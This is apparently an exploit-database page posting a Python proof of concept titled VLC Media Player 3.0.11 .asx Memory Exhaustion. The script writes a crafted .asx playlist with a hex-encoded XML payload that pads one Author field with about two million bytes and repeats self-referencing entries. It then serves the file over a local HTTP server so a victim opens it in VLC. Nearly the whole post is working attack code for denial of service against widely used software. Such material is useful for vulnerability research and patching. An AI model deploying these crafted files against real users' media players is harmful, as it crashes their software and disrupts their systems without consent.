VLC Media Player 3.0.11 - .asx Memory Exhaustion

2020.09.19
sa albalawi-s (SA) sa
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: VLC Media Player 3.0.11 - .asx Memory Exhaustion # Author: albalawi-s # Vendor Website : http://www.videolan.org # Tested on: Windows 10 (64 bit) #video: https://youtu.be/pVG_v-Qh9F0 import BaseHTTPServer import sys test="fuzz.asx" s="\x3c\x41\x73\x78\x20\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22\x33\x2e\x30\x22\x20\x3e\x20\x0a\x20\x20\x3c\x50\x61\x72\x61\x6d\x20\x4e\x61\x6d\x65\x20\x3d\x20\x22\x41\x6c\x6c\x6f\x77\x53\x68\x75\x66\x66\x6c\x65\x22\x20\x56\x61\x6c\x75\x65\x20\x3d\x20\x22\x79\x65\x73\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x45\x6e\x74\x72\x79\x3e\x20\x0a\x09\x3c\x41\x75\x74\x68\x6f\x72\x20\x3e"+'\x41'*2072480+"\x3c\x2f\x41\x75\x74\x68\x6f\x72\x3e\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x41\x75\x74\x68\x6f\x72\x20\x3e\x3c\x2f\x41\x75\x74\x68\x6f\x72\x3e\x09\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x09\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x09\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test+"\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x2f\x45\x6e\x74\x72\x79\x3e\x0a\x3c\x2f\x41\x73\x78\x3e" fff=open(test,'w') fff.write(s) fff.close() from SimpleHTTPServer import SimpleHTTPRequestHandler HandlerClass = SimpleHTTPRequestHandler ServerClass = BaseHTTPServer.HTTPServer Protocol = "HTTP/1.0" if sys.argv[1:]: port = int(sys.argv[1]) else: port =8080 server_address = ('192.168.1.4',port) HandlerClass.protocol_version = Protocol httpd = ServerClass(server_address, HandlerClass) sa = httpd.socket.getsockname() print sa[0],sa[1],'fuzz4.asx' print "open vlc and open file fuzz4.asx or ctrl+V paste http://ip:port/{}".format(test) print "http://{}:{}/{}".format(sa[0],sa[1],test) httpd.serve_forever()


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top